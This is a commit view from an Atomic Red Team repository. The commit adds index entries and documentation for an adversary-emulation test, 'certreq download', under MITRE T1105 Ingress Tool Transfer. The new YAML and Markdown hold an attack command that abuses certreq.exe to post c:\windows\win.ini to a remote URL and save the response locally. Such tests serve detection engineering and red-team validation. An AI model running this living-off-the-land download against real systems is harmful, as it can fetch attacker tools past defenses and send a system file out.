security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-07-25 20:45:40 +00:00
parent 7cfc9b3bef
commit d63433c2c7
6 changed files with 62 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -1243,6 +1243,7 @@ command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d
command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1243 command-and-control T1105 Ingress Tool Transfer 22 Printer Migration Command-Line Tool UNC share folder into a zip file 49845fc1-7961-4590-a0f0-3dbcf065ae7e command_prompt
1244 command-and-control T1105 Ingress Tool Transfer 23 Lolbas replace.exe use to copy file 54782d65-12f0-47a5-b4c1-b70ee23de6df command_prompt
1245 command-and-control T1105 Ingress Tool Transfer 24 Lolbas replace.exe use to copy UNC file ed0335ac-0354-400c-8148-f6151d20035a command_prompt
1246 command-and-control T1105 Ingress Tool Transfer 25 certreq download 6fdaae87-c05b-42f8-842e-991a74e8376b command_prompt
1247 command-and-control T1090.001 Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
1248 command-and-control T1090.001 Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
1249 command-and-control T1090.001 Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
atomics/Indexes/Indexes-CSV/windows-index.csv
+1
View File
@@ -902,6 +902,7 @@ command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d
command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
902 command-and-control T1105 Ingress Tool Transfer 22 Printer Migration Command-Line Tool UNC share folder into a zip file 49845fc1-7961-4590-a0f0-3dbcf065ae7e command_prompt
903 command-and-control T1105 Ingress Tool Transfer 23 Lolbas replace.exe use to copy file 54782d65-12f0-47a5-b4c1-b70ee23de6df command_prompt
904 command-and-control T1105 Ingress Tool Transfer 24 Lolbas replace.exe use to copy UNC file ed0335ac-0354-400c-8148-f6151d20035a command_prompt
905 command-and-control T1105 Ingress Tool Transfer 25 certreq download 6fdaae87-c05b-42f8-842e-991a74e8376b command_prompt
906 command-and-control T1090.001 Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
907 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
908 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -2085,6 +2085,7 @@
- Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
atomics/Indexes/Indexes-Markdown/windows-index.md
+1
View File
@@ -1514,6 +1514,7 @@
- Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
atomics/Indexes/index.yaml
+18
View File
@@ -91039,6 +91039,24 @@ command-and-control:
'
name: command_prompt
- name: certreq download
auto_generated_guid: 6fdaae87-c05b-42f8-842e-991a74e8376b
description: Use certreq to download a file from the web
supported_platforms:
- windows
input_arguments:
local_path:
description: Local path to place file
type: String
default: "%temp%\\Atomic-license.txt"
remote_file:
description: URL of file to copy
type: url
default: https://example.com
executor:
command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}'
cleanup_command: 'del #{local_path} >nul 2>&1'
name: command_prompt
T1001.002:
technique:
x_mitre_platforms:
atomics/T1105/T1105.md
+40
View File
@@ -56,6 +56,8 @@ On Windows, adversaries may use various utilities to download tools, such as `co
- [Atomic Test #24 - Lolbas replace.exe use to copy UNC file](#atomic-test-24---lolbas-replaceexe-use-to-copy-unc-file)
- [Atomic Test #25 - certreq download](#atomic-test-25---certreq-download)
<br/>
@@ -1092,4 +1094,42 @@ del %TEMP%\redcanary.cab >nul 2>&1
<br/>
<br/>
## Atomic Test #25 - certreq download
Use certreq to download a file from the web
**Supported Platforms:** Windows
**auto_generated_guid:** 6fdaae87-c05b-42f8-842e-991a74e8376b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_path | Local path to place file | String | %temp%&#92;Atomic-license.txt|
| remote_file | URL of file to copy | url | https://example.com|
#### Attack Commands: Run with `command_prompt`!
```cmd
certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}
```
#### Cleanup Commands:
```cmd
del #{local_path} >nul 2>&1
```
<br/>